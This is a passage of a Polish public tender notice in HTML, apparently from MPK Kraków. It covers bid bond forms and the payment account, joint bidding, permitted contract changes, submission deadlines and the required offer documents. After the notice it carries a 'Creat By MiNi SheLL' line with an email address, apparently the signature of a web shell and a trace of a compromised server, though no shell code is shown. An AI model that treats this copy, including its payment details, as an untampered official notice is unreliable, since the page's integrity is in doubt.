00/100)<br/>2.	Wadium może być wniesione w jednej lub kilku następujących formach tj.: <br/>2.1.	pieniądzu; <br/>2.2.	gwarancjach bankowych; <br/>2.3.	gwarancjach ubezpieczeniowych; <br/>2.4.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>3.	W przypadku wnoszenia wadium w pieniądzu, wadium należy wpłacić przelewem na rachunek bankowy Zamawiającego nr: Santander Bank Polska nr 77 1090 2053 0000 0001 4392 4324 (dla przelewów zagranicznych w PLN (IBAN): PL 77 1090 2053 0000 0001 4392 4324 SWIFT CODE: WBKPPLPP) z dopiskiem „Wadium do zabezpieczenia oferty złożonej przez ……., znak sprawy LP.281.109.2021”. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. <br/>4. Pozostałe informacje dotyczące<br/>wadium zawarte są w SWZ i ustawie Prawo zamówień publicznych. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Ten sam wykonawca może być członkiem tylko jednej grupy wykonawców wspólnie ubiegających się o udzielenie zamówienia. <br/>2.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>3.	Zapis SWZ dotyczące wykonawcy stosuje się odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. [Przypadki wprowadzenia zmian] W przypadkach przewidzianych przepisami PZP oraz w<br/>przypadkach przewidzianych w Umowie, dopuszcza się zmiany postanowień zawartej Umowy w<br/>stosunku do treści oferty Wykonawcy w celu:<br/>1.1	optymalizacji kosztów ponoszonych przez Zamawiającego w związku z realizacją Umowy;<br/>1.2	poprawy bezpieczeństwa ludzi i mienia w związku z realizacją umowy;<br/>1.3	poprawy jakości, wydajności lub bezpieczeństwa realizacji zakresu prac Wykonawcy; <br/>1.4	odzwierciedlenia wystąpienia okoliczności, za wystąpienie których odpowiada Zamawiający zgodnie z postanowieniami ust. 6.3. (Zmiana konieczna z powodu wystąpienia okoliczności, za które odpowiada Zamawiający) umowy;<br/>1.5	uwzględnienia okoliczności siły wyższej (§ 20 umowy);<br/>1.6	Zakres zmiany może dotyczyć: (i) zmiany co do sposobu wykonania usług (ii) zmiany co do terminu lub terminów wykonywania zobowiązań Wykonawcy lub innych terminów wykonania umowy, lub zmiany wynagrodzenia wskazanego w § 12 lub (iii) zmian w zakresie terminów umownych lub wynagrodzenia, o których mowa i w zakresie przewidzianym w ust. 6.3. (Zmiana konieczna z powodu wystąpienia okoliczności, za które odpowiada Zamawiający) umowy.<br/>2. [Zakres wprowadzenia zmian] <br/>2.1	Zakres zmiany może dotyczyć:<br/>a)	Obniżenia ceny jednostkowej z inicjatywy Wykonawcy,<br/>b)	wydłużenia okresu obowiązywania niniejszej umowy, <br/>c)	zmian organizacyjnych w zakresie sposobu świadczenia usług stanowiących przedmiot zamówienia (zmiany godzin świadczenia usług)<br/>d)	obniżenia wynagrodzenia przez Wykonawcę w każdym czasie<br/>e)	zmiany zakresu udzielonych praw autorskich, jeśli zaistnieje zasadność wprowadzenia takiej zmiany.<br/>f)	zmiany zakresu czynności wskazanych w załączniku nr 3 do umowy. <br/>3. . Pozostałe informacje dotyczące zmian umowy zawarte są w Projektowanych<br/>postanowieniach umowy, stanowiących załącznik do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-15 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma zakupowa Zamawiającego: https://mpk-krakow.ezamawiajacy.pl/app/login</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-15 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-11-12</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1. Ofertę tworzą następujące dokumenty<br/>1.1.	wypełniony formularz oferty (zgodnie z załącznikiem nr 2 do SWZ);<br/>1.2.	wypełniony formularz cenowy wg załącznika nr 11 do SIWZ <br/>2.	Do oferty należy dołączyć następujące dokumenty<br/>2.1.	oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp opisane w rozdziale IX SWZ, zgodnie z załącznikiem nr 1 do SWZ;<br/>2.2.	odpis lub informację Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru dotyczącą wykonawcy, w celu potwierdzenie umocowania do działania w imieniu wykonawcy; <br/>2.3.	pełnomocnictwo lub inny dokumentu potwierdzającego umocowanie do reprezentowania wykonawcy, jeżeli w imieniu wykonawcy działa osoba, której umocowanie do jego reprezentowania nie wynika z dokumentów, o których mowa w pkt 2.2. Zapis stosuje się odpowiednio do osoby działającej w imieniu wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2.4.	dokumenty wskazane w pkt 2.2 i 2.3 dla osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp lub w imieniu podwykonawcy niebędącego podmiotem udostępniającym zasoby, jeżeli dotyczy.<br/>2.5.	wadium, jeżeli składane jest w formie niepieniężnej. W przypadku wnoszenia wadium w formie pieniądza zalecane jest dołączenie do oferty potwierdzenia dokonania przelewu.<br/>2.6.	zobowiązanie podmiotu udostępniającego zasoby do oddania do dyspozycji wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, jeżeli dotyczy. Wzór zobowiązania zawarty jest w załączniku nr 7 do SWZ.<br/>2.7.	oświadczenie, o którym mowa w rozdziale VII pkt 3 SWZ, jeżeli dotyczy. Wzór oświadczenia zawarty jest w załączniku nr 9 do SWZ.

Creat By MiNi SheLL
Email: jattceo@gmail.com